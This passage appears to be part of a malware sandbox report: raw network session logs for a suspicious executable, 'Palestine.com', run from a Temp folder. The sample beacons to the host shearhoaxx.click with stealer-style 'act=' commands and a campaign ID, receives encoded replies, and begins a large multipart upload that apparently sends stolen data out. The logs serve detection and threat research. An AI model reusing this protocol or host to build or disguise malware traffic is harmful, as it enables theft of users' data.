                                                                                                                                                                                                                                            Data Ascii: {&[%[@aP-$,n!<"w)AhbVbjiWJ$dP6*]79Z613>V'|(0F!_d,WQQNC8m/1:EQI1c)+JD*T8uj11S!]TQjc('@trnJdZEx1*
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: 18 5a e3 02 e2 a1 85 e4 16 60 b7 9f 45 78 8d 9d 94 56 e1 e3 19 62 b2 b1 53 53 af 50 c5 0e 1c 94 b8 29 39 3a 55 c0 c1 93 c6 52 e0 ce a7 72 53 5c 59 71 a7 88 55 a9 d0 26 24 6c ef 5d e5 c4 d2 62 d5 b2 76 73 f3 30 64 2b 8a 41 23 0f 44 8d c6 af 25 55 98 62 14 a6 51 d2 56 50 c8 5a c8 47 0c f9 72 48 4e 31 05 1e 4c f3 a3 05 ac e5 68 64 30 43 50 72 73 9f 52 1f d2 52 c3 c1 03 cc 14 05 15 2e 51 15 6a 29 76 88 1c 25 34 09 7a e8 7a ea f2 9b fb 4f f0 23 97 83 bc 51 8d 11 be 47 ac f8 78 48 42 91 85 94 90 7c a7 9d cf d3 d2 69 a3 9a 94 14 87 b1 5e 97 b1 c7 93 0d b8 c9 85 07 c0 89 af 44 23 d2 8c 36 91 58 cc 30 31 a8 6f 2e 0e bf 95 b1 e3 04 58 55 75 73 ff b4 04 7e 85 3b 45 3c b4 bd 83 c4 c0 7d 62 a5 02 ee f4 d0 29 31 03 da 63 7b cf 4e 50 24 1a 9d 48 8b c9 c2 4a 8d 0a ca ba
                                                                                                                                                                                                                                            Data Ascii: Z`ExVbSSP)9:URrS\YqU&$l]bvs0d+A#D%UbQVPZGrHN1Lhd0CPrsRR.Qj)v%4zzO#QGxHB|i^D#6X01o.XUus~;E<}b)1c{NP$HJ
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: a8 13 95 8c 56 08 bc cd 84 87 f2 0b cd 10 d5 e5 45 e8 78 79 4c 14 14 98 85 38 55 aa 02 28 e1 fe ba 82 88 43 f9 de 0a aa 79 f0 e6 9c 83 4b 09 61 39 f4 08 46 07 f4 af f4 15 8e d1 7d 89 12 dc 98 c5 77 ce 20 2e 7d f6 18 b5 9c 7e b4 bc 2b b1 e3 f1 23 46 c3 56 b9 9a f0 a1 07 32 d1 f9 7d 41 01 4f c5 ab a6 55 c9 57 06 a6 aa 82 54 41 2d ad 25 1e 7c 9f 8c b2 3b 9a f9 4a a5 b0 6e 7e 88 38 ab d8 91 30 9e f7 82 cb 95 24 58 4e 9b bf 00 9a ca c0 47 ff 97 28 5d a4 02 30 5a 19 21 f9 7a 44 65 88 44 e5 2c 89 91 e8 4b 54 01 30 47 15 fb ca 16 41 a0 fb 71 4b 19 df c4 01 f3 29 85 e0 5b 1d 7e 29 a3 d4 0a 2d 8c c7 09 29 03 e0 17 52 23 54 90 40 55 74 f4 34 bf 94 88 74 1e 11 f9 9f ac 09 6a 3a 62 70 9d 07 9f 8b 07 1d 2d 2c 86 8a 70 d9 02 4a e8 47 07 3b de 28 3c 0b a4 10 49 59 7d 1c
                                                                                                                                                                                                                                            Data Ascii: VExyL8U(CyKa9F}w .}~+#FV2}AOUWTA-%|;Jn~80$XNG(]0Z!zDeD,KT0GAqK)[~)-)R#T@Ut4tj:bp-,pJG;(<IY}
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: ef 0a a1 2c 2e cc 7b c4 50 9e 87 3a 15 99 e8 63 b5 60 90 98 55 a9 c1 71 4e a9 a0 2a 68 27 36 69 09 f9 e5 15 0f 3c 9a 05 e6 2b 60 f4 a3 3b 82 e1 52 8c ec 28 00 c6 4d 5b 63 6e 54 4f d8 d7 c0 3d b8 0d 8b c4 9a c6 b2 9f 61 97 90 51 02 50 e2 30 a3 c7 4a b1 5c 02 a3 d4 98 e8 ef 86 02 2b 2d 80 81 42 71 e4 e6 cb 94 8c 8b a7 a4 8f 57 53 7e 44 f8 52 ca e3 f3 ab 20 d8 84 02 52 cd 50 4d 64 f8 62 4e 41 be bc 1c b1 68 d2 42 17 26 88 11 7b c8 1b c3 b0 b1 d1 51 97 2a a6 2b 83 2c 52 e1 03 7b 52 43 98 b8 4a 2c 1b 9e c0 e8 01 5e 37 be df e7 24 c5 12 a0 01 25 24 6c 23 56 00 89 bd d8 c8 fa 41 26 f7 39 f5 94 7b 58 0b 30 4c f3 1c 0e 03 11 eb 70 df a6 02 37 9d 64 a4 10 4c 53 65 af e0 d2 d7 e6 74 3e 7c 2b 1f fa 3f 36 4f 12 09 3b 16 41 60 f1 11 71 7c 39 c4 d6 cd 77 dd 04 42 3a b6
                                                                                                                                                                                                                                            Data Ascii: ,.{P:c`UqN*h'6i<+`;R(M[cnTO=aQP0J\+-BqWS~DR RPMdbNAhB&{Q*+,R{RCJ,^7$%$l#VA&9{X0Lp7dLSet>|+?6O;A`q|9wB:
                                                                                                                                                                                                                                            2024-12-23 09:35:54 UTC1369INData Raw: bb 3f 7f 62 5a fc 58 46 05 27 f0 54 e7 aa c6 4e c3 89 5d f5 96 d7 7f 73 32 ee 5e f1 52 22 3c 83 a9 6b de ba 2d 3d 72 fb 60 fa 65 6d bd 68 55 d1 d6 ad a9 64 34 f7 ba 7f 42 cd c5 0d d1 a1 71 1b ea a5 9c da 5f 75 a7 7d 6d e9 cb bf 37 0e 8d d7 d6 73 c6 ff fe 8b 58 f3 47 ed 96 e1 40 ff 07 77 fd 8e c9 6c de 91 cc 7c 58 30 ee b6 ef ef fd d3 fc e1 bb bb 72 9e d8 70 23 3a 25 70 b2 76 7b 72 d3 86 ef bf fa f0 db 8e c0 94 e5 33 57 ac 7c 27 df 7a f4 db 8c f2 47 1b 76 4f 9d 92 39 1c 67 72 6f 08 26 e4 8c 75 27 df ff ba 67 95 62 a3 63 5d 9c e3 ba 7f f6 31 e5 f9 58 38 f0 e8 07 23 a6 c7 5b ff 7c 25 a9 4b 4d ca ce dc b6 d4 b8 67 55 5d f2 50 6b c1 c0 4b b3 ca 06 6f 3f f6 c4 65 59 83 cf fc 5d 7a e9 b6 fb 6e 7f cf 18 cc 08 58 f3 c8 86 bf 7c fb b7 b7 76 e4 ee bb 92 7d e2 80 b2
                                                                                                                                                                                                                                            Data Ascii: ?bZXF'TN]s2^R"<k-=r`emhUd4Bq_u}m7sXG@wl|X0rp#:%pv{r3W|'zGvO9gro&u'gbc]1X8#[|%KMgU]PkKo?eY]znX|v}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.16 | 49713 | 172.67.129.49 | 443 | 6148 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:36:04 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: shearhoaxx.click
2024-12-23 09:36:04 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                            Data Ascii: act=life
2024-12-23 09:36:05 UTC | 1136 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:05 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=7mjm2v2vddafnhcqec9oe15ulc; expires=Fri, 18 Apr 2025 03:22:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hFk%2FYJSbjHHj8%2FrvZzoNPaPviJFG4uizDQu%2B1qEuuVD1cnb3TLt1xaVUaETfqJR%2BM2SUr%2B4%2BuyE%2Bjgi%2BgE3V%2Bxa%2FgKRw4qYO3DF5MuxtLrXlwkzeFFiGRZmehsHtEXIJXl4G"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675d7bbc9b42d7-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1669&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=907&delivery_rate=1651583&cwnd=245&unsent_bytes=0&cid=dcb5c1dff38fcb1f&ts=1061&x=0"
2024-12-23 09:36:05 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok
2024-12-23 09:36:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.16 | 49714 | 172.67.129.49 | 443 | 6148 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:36:06 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Host: shearhoaxx.click
2024-12-23 09:36:06 UTC | 45 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 38 38 38 26 6a 3d
                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=Dvh8ui--888&j=
2024-12-23 09:36:07 UTC | 1117 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:07 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=pm70dp7rnj05c6776mgk1et4ls; expires=Fri, 18 Apr 2025 03:22:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtsvpqACoBoDzr2tTuyxY34gw8jmSFNVJkVL%2F2qDL6whf2EyMlGZFLUHKJ5Nh49vB5v8JhJDmDECx2txC6RNR3sgewiAhi5n6rUgtkwkuKETdGkZVTdpVe0RLMvMdGwzs6Dq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675d89f8300f79-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1648&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=945&delivery_rate=1763285&cwnd=241&unsent_bytes=0&cid=a3e0775ef75b2eea&ts=800&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC252INData Raw: 63 34 65 0d 0a 56 67 64 79 6e 6d 2b 68 4b 2b 6b 2f 36 79 4c 2f 6a 65 75 2f 63 6c 71 6a 71 74 4c 48 6f 58 63 6d 6d 5a 67 58 4c 2f 50 39 2f 2b 49 74 4a 51 53 38 56 5a 55 48 79 30 79 4f 41 4d 58 35 6d 63 6f 58 64 6f 48 4c 74 75 57 62 45 55 66 31 36 33 49 44 30 59 75 53 77 47 78 68 45 2f 49 63 78 41 66 4c 57 70 4d 41 78 64 61 51 6e 52 63 30 67 5a 44 77 6f 73 73 56 52 2f 58 36 64 6b 53 63 6a 5a 4f 42 50 6d 73 56 39 67 72 43 54 34 68 54 68 6b 65 61 36 49 72 56 48 44 50 4f 77 72 2f 6c 6a 56 56 44 34 37 6f 74 44 62 36 59 69 34 4d 62 5a 67 48 31 54 64 77 48 6b 68 32 4f 54 4e 32 33 79 64 34 58 4f 4d 2f 4d 74 71 7a 4a 48 30 37 39 2b 33 4e 46 67 35 53 5a 69 6a 35 6c 46 76 63 41 79 31 75 46 57 59 46 4d 6e 4f 4b 4b 6e 56 35 34 78 74 44 77 2f 59 4e 47 64 76 6a
                                                                                                                                                                                                                                            Data Ascii: c4eVgdynm+hK+k/6yL/jeu/clqjqtLHoXcmmZgXL/P9/+ItJQS8VZUHy0yOAMX5mcoXdoHLtuWbEUf163ID0YuSwGxhE/IcxAfLWpMAxdaQnRc0gZDwossVR/X6dkScjZOBPmsV9grCT4hThkea6IrVHDPOwr/ljVVD47otDb6Yi4MbZgH1TdwHkh2OTN23yd4XOM/MtqzJH079+3NFg5SZij5lFvcAy1uFWYFMnOKKnV54xtDw/YNGdvj
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 72 5a 46 69 63 6a 35 76 41 4b 79 73 4a 76 41 72 50 43 64 4d 64 67 55 79 54 36 6f 72 53 46 7a 6e 42 32 72 2b 6c 77 42 31 4d 2f 2f 42 36 51 70 36 52 6c 34 63 38 62 42 66 7a 43 73 74 50 68 46 37 4a 44 74 33 6f 6b 5a 31 49 65 4f 48 59 73 36 62 58 47 46 57 37 35 54 74 55 30 5a 69 52 77 47 77 6c 46 76 49 4d 7a 6b 6d 5a 56 59 4a 4c 6d 50 32 43 31 42 30 31 77 63 57 36 71 73 41 56 51 2f 48 77 65 6b 65 56 6b 70 43 47 4e 47 56 51 73 6b 33 45 55 63 73 46 79 57 4f 59 2f 34 37 52 42 6e 72 37 69 4b 2f 72 32 6c 56 44 39 37 6f 74 44 5a 6d 61 6e 6f 4d 2f 61 68 50 30 42 74 46 4a 6d 56 75 45 52 59 2f 70 6a 4e 4d 61 4f 39 50 43 76 71 50 41 48 45 2f 79 2f 33 4a 4a 30 64 48 64 68 79 77 6c 53 4c 77 73 7a 6b 4b 48 56 35 35 41 33 66 44 48 78 46 41 2f 7a 59 6a 6f 35 63 63 55 51 50
                                                                                                                                                                                                                                            Data Ascii: rZFicj5vAKysJvArPCdMdgUyT6orSFznB2r+lwB1M//B6Qp6Rl4c8bBfzCstPhF7JDt3okZ1IeOHYs6bXGFW75TtU0ZiRwGwlFvIMzkmZVYJLmP2C1B01wcW6qsAVQ/HwekeVkpCGNGVQsk3EUcsFyWOY/47RBnr7iK/r2lVD97otDZmanoM/ahP0BtFJmVuERY/pjNMaO9PCvqPAHE/y/3JJ0dHdhywlSLwszkKHV55A3fDHxFA/zYjo5ccUQP
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 69 64 2f 46 77 42 35 6d 42 50 38 48 67 58 79 49 55 34 64 48 69 36 2b 57 6b 77 6c 34 78 73 54 77 2f 59 4d 59 52 66 50 38 5a 30 4b 63 6e 4a 4f 4f 4f 32 41 66 39 41 33 44 52 49 35 5a 67 6b 75 65 34 6f 33 50 47 6a 6a 4a 7a 62 47 76 79 56 55 4b 75 2f 31 74 44 63 6e 66 72 4a 63 2f 4a 79 58 2f 41 38 31 4f 6e 52 32 57 44 6f 53 76 6a 74 46 51 59 49 48 46 75 4b 44 47 47 6b 58 78 39 48 42 48 6e 5a 65 54 67 79 5a 71 46 50 77 42 79 30 4f 47 55 34 31 49 6c 4f 53 43 32 78 41 35 79 34 6a 2b 35 63 51 4e 42 4b 4f 36 51 55 71 64 6b 70 4c 43 41 57 59 65 38 67 72 56 43 5a 51 54 6b 41 43 61 34 38 6d 46 55 44 54 49 79 4c 75 76 78 78 56 44 39 76 39 32 53 70 4b 53 6d 6f 6f 36 59 68 54 77 42 4d 35 50 69 31 71 4e 52 59 2f 71 67 4e 45 63 65 49 2b 49 74 37 32 44 54 51 54 55 2f 57 4e
                                                                                                                                                                                                                                            Data Ascii: id/FwB5mBP8HgXyIU4dHi6+Wkwl4xsTw/YMYRfP8Z0KcnJOOO2Af9A3DRI5Zgkue4o3PGjjJzbGvyVUKu/1tDcnfrJc/JyX/A81OnR2WDoSvjtFQYIHFuKDGGkXx9HBHnZeTgyZqFPwBy0OGU41IlOSC2xA5y4j+5cQNBKO6QUqdkpLCAWYe8grVCZQTkACa48mFUDTIyLuvxxVD9v92SpKSmoo6YhTwBM5Pi1qNRY/qgNEceI+It72DTQTU/WN
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC167INData Raw: 49 6b 6d 61 78 37 31 41 4d 56 42 6a 46 4f 45 53 35 76 6b 6a 74 6f 57 4e 63 6e 46 74 61 62 43 45 55 37 70 2b 58 35 48 6e 4a 58 64 7a 6e 52 69 43 4c 78 56 67 32 36 48 64 4a 6c 62 6a 2f 6e 4a 77 6c 34 68 67 63 2b 38 35 5a 74 56 52 2f 54 7a 65 6b 57 5a 6b 4a 4b 45 4f 6d 4d 57 38 51 6a 4d 51 35 6c 56 68 30 32 57 34 49 4c 50 45 44 58 46 78 4c 53 74 79 42 38 45 74 62 70 79 56 64 48 48 33 62 55 35 61 68 44 2f 47 34 4e 57 78 55 54 4a 52 35 47 76 30 5a 30 63 4e 73 48 48 76 4b 6e 49 48 55 58 33 39 48 0d 0a
                                                                                                                                                                                                                                            Data Ascii: Ikmax71AMVBjFOES5vkjtoWNcnFtabCEU7p+X5HnJXdznRiCLxVg26HdJlbj/nJwl4hgc+85ZtVR/TzekWZkJKEOmMW8QjMQ5lVh02W4ILPEDXFxLStyB8EtbpyVdHH3bU5ahD/G4NWxUTJR5Gv0Z0cNsHHvKnIHUX39H
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 32 38 63 63 0d 0a 4a 49 6d 4a 65 56 6b 6a 56 68 47 50 30 44 7a 45 69 50 57 49 78 45 6d 75 75 50 30 6c 42 32 67 63 2b 6f 35 5a 74 56 61 39 7a 50 4e 32 79 72 33 34 4c 4f 4c 53 55 58 38 45 32 62 43 59 64 65 68 55 69 53 36 59 44 52 47 6a 48 4b 78 4c 75 68 7a 78 78 42 2f 66 74 77 53 4a 43 62 6b 59 6f 79 5a 68 50 7a 41 73 78 42 79 78 50 4a 52 34 57 76 30 5a 30 31 4c 38 72 47 74 75 58 63 57 31 32 37 2f 58 6b 4e 79 64 2b 52 69 54 4a 6a 46 66 41 4d 78 55 47 4f 56 59 31 42 6d 2b 6d 4b 30 68 51 39 77 4d 65 30 71 63 30 66 52 66 72 32 66 6b 4b 61 6d 74 33 4f 64 47 49 49 76 46 57 44 65 49 68 4c 6e 6c 43 52 72 35 61 54 43 58 6a 47 78 50 44 39 67 78 52 57 38 66 42 37 53 4a 36 61 6e 6f 38 7a 61 42 62 77 42 38 70 42 6a 56 4b 41 55 70 37 6a 68 39 6f 65 4e 4d 2f 46 75 71 62
                                                                                                                                                                                                                                            Data Ascii: 28ccJImJeVkjVhGP0DzEiPWIxEmuuP0lB2gc+o5ZtVa9zPN2yr34LOLSUX8E2bCYdehUiS6YDRGjHKxLuhzxxB/ftwSJCbkYoyZhPzAsxByxPJR4Wv0Z01L8rGtuXcW127/XkNyd+RiTJjFfAMxUGOVY1Bm+mK0hQ9wMe0qc0fRfr2fkKamt3OdGIIvFWDeIhLnlCRr5aTCXjGxPD9gxRW8fB7SJ6ano8zaBbwB8pBjVKAUp7jh9oeNM/Fuqb
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 4f 68 2f 53 70 61 55 6c 59 73 37 59 77 4c 77 41 39 46 4d 6d 55 2f 4a 44 74 33 6f 6b 5a 31 49 65 50 66 50 6f 4c 58 41 56 33 58 74 2b 57 4e 47 6e 4a 50 64 6e 33 70 38 55 50 73 42 67 78 48 4c 57 34 5a 4a 6e 75 43 49 31 42 77 31 78 4d 47 31 70 4d 55 52 54 76 48 36 63 30 75 51 6d 70 65 44 4e 57 38 5a 2b 77 58 45 53 70 6b 64 78 77 43 61 39 38 6d 46 55 42 48 47 32 72 36 31 67 77 6f 4b 34 72 70 79 51 64 48 48 33 59 51 2b 61 68 54 37 41 63 56 4d 6a 56 43 49 54 35 7a 76 68 74 6b 62 4d 63 66 4a 76 61 44 4f 45 56 62 78 38 58 70 42 6d 4a 4f 51 77 48 6f 6c 46 2b 52 4e 6d 77 6d 36 55 49 64 4f 6d 76 6e 4a 77 6c 34 68 67 63 2b 38 35 5a 74 56 52 66 66 31 64 6b 4b 53 6e 4a 79 4b 4a 6e 63 63 39 51 58 47 52 59 42 54 6a 31 4b 62 34 49 44 65 45 7a 48 47 77 4c 79 76 77 42 49 45
                                                                                                                                                                                                                                            Data Ascii: Oh/SpaUlYs7YwLwA9FMmU/JDt3okZ1IePfPoLXAV3Xt+WNGnJPdn3p8UPsBgxHLW4ZJnuCI1Bw1xMG1pMURTvH6c0uQmpeDNW8Z+wXESpkdxwCa98mFUBHG2r61gwoK4rpyQdHH3YQ+ahT7AcVMjVCIT5zvhtkbMcfJvaDOEVbx8XpBmJOQwHolF+RNmwm6UIdOmvnJwl4hgc+85ZtVRff1dkKSnJyKJncc9QXGRYBTj1Kb4IDeEzHGwLyvwBIE
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 75 42 69 4a 71 66 65 6e 78 51 2b 77 47 44 45 63 74 62 67 45 61 61 36 59 66 50 46 54 37 4f 78 37 6d 73 78 78 31 48 2b 2f 35 78 53 70 53 63 6b 59 73 7a 5a 68 2f 34 42 4d 31 41 68 42 33 48 41 4a 72 33 79 59 56 51 47 64 72 4c 76 4b 69 44 43 67 72 69 75 6e 4a 42 30 63 66 64 6a 44 70 67 45 50 59 4c 78 30 79 4e 56 34 78 41 6c 75 79 47 32 52 59 38 7a 73 69 37 72 4d 49 54 51 66 48 78 63 30 43 53 6d 5a 76 41 65 69 55 58 35 45 32 62 43 61 74 47 68 45 79 61 72 35 61 54 43 58 6a 47 78 50 44 39 67 78 35 49 2f 2f 31 31 51 4a 4b 58 6d 49 51 2b 59 42 44 30 48 38 74 4a 6a 45 2b 62 51 4a 54 71 68 64 34 51 50 4d 66 42 74 71 62 48 56 51 71 37 2f 57 30 4e 79 64 2b 77 6a 44 4e 4d 46 2b 64 4e 33 41 65 53 48 59 35 4d 33 62 66 4a 33 42 73 79 7a 73 57 7a 6f 38 41 65 51 66 48 37 63
                                                                                                                                                                                                                                            Data Ascii: uBiJqfenxQ+wGDEctbgEaa6YfPFT7Ox7msxx1H+/5xSpSckYszZh/4BM1AhB3HAJr3yYVQGdrLvKiDCgriunJB0cfdjDpgEPYLx0yNV4xAluyG2RY8zsi7rMITQfHxc0CSmZvAeiUX5E2bCatGhEyar5aTCXjGxPD9gx5I//11QJKXmIQ+YBD0H8tJjE+bQJTqhd4QPMfBtqbHVQq7/W0Nyd+wjDNMF+dN3AeSHY5M3bfJ3BsyzsWzo8AeQfH7c
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 64 32 47 59 72 55 4f 35 4e 6d 77 6e 4d 58 70 74 53 6d 2b 79 66 33 6c 63 47 2f 2b 2b 6d 72 38 51 46 51 2b 7a 31 4e 51 50 52 6b 4e 33 59 44 53 55 5a 2b 78 62 53 58 34 5a 4e 6a 67 43 69 6f 63 6e 46 55 47 43 42 2f 62 4f 72 7a 52 4a 53 36 72 64 53 57 35 75 59 6a 59 63 6a 61 6c 43 79 54 63 55 4a 30 77 37 48 41 4a 6e 2b 79 59 56 41 61 70 71 64 34 2f 4b 54 52 31 75 31 34 7a 56 62 30 63 66 50 7a 6e 52 33 55 4b 52 4e 68 45 71 5a 54 34 39 44 69 2b 7a 4f 34 79 34 66 32 38 57 32 73 74 49 72 65 76 7a 67 65 45 75 47 6a 74 47 56 4e 32 73 65 2b 78 75 44 42 38 74 53 79 52 69 6b 72 38 47 64 4c 33 61 42 30 50 44 39 67 79 42 48 39 66 52 79 57 34 44 53 75 70 6f 35 59 77 66 74 54 59 30 4a 6a 52 33 52 45 4e 4f 76 6a 63 78 51 59 4a 47 61 36 2f 43 51 51 68 53 70 35 54 74 55 30 59
                                                                                                                                                                                                                                            Data Ascii: d2GYrUO5NmwnMXptSm+yf3lcG/++mr8QFQ+z1NQPRkN3YDSUZ+xbSX4ZNjgCiocnFUGCB/bOrzRJS6rdSW5uYjYcjalCyTcUJ0w7HAJn+yYVAapqd4/KTR1u14zVb0cfPznR3UKRNhEqZT49Di+zO4y4f28W2stIrevzgeEuGjtGVN2se+xuDB8tSyRikr8GdL3aB0PD9gyBH9fRyW4DSupo5YwftTY0JjR3RENOvjcxQYJGa6/CQQhSp5TtU0Y
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 59 67 62 74 54 59 30 4a 68 42 33 52 65 64 32 6e 79 65 4a 65 65 4e 6d 49 36 4f 58 32 46 6b 72 31 2f 57 4e 63 33 4c 69 54 68 7a 56 7a 41 4f 73 43 67 77 66 4c 57 38 6b 59 7a 36 48 4a 32 51 46 34 6d 5a 6a 69 2f 70 5a 47 45 36 75 6f 61 67 4f 49 33 34 76 41 62 44 64 65 76 42 2b 44 45 63 73 61 69 6c 4b 50 36 59 72 4c 45 33 2f 2f 39 70 65 72 78 42 52 53 36 2b 31 36 41 72 2b 70 76 4c 34 4b 63 42 50 79 41 38 52 66 6d 68 33 48 41 4a 4b 76 30 65 52 51 63 49 48 33 2f 75 58 62 56 52 79 37 7a 33 5a 44 6e 35 69 4c 6b 58 6c 43 48 76 73 4d 31 56 6d 63 55 73 5a 75 71 38 37 4a 6b 31 41 2b 67 5a 44 69 36 34 4d 52 56 62 75 69 4a 52 2f 4b 79 73 37 58 5a 44 63 50 73 68 53 44 58 38 73 46 32 77 37 64 2f 63 6d 46 55 48 2f 43 32 71 4b 6a 77 41 4e 48 76 4d 52 4c 61 70 2b 59 6e 4a 59
                                                                                                                                                                                                                                            Data Ascii: YgbtTY0JhB3Red2nyeJeeNmI6OX2Fkr1/WNc3LiThzVzAOsCgwfLW8kYz6HJ2QF4mZji/pZGE6uoagOI34vAbDdevB+DEcsailKP6YrLE3//9perxBRS6+16Ar+pvL4KcBPyA8Rfmh3HAJKv0eRQcIH3/uXbVRy7z3ZDn5iLkXlCHvsM1VmcUsZuq87Jk1A+gZDi64MRVbuiJR/Kys7XZDcPshSDX8sF2w7d/cmFUH/C2qKjwANHvMRLap+YnJY


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.16 | 49715 | 172.67.129.49 | 443 | 6148 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:36:08 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=LQVNKLL36YG3RCUP2
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 12836
                                                                                                                                                                                                                                            Host: shearhoaxx.click
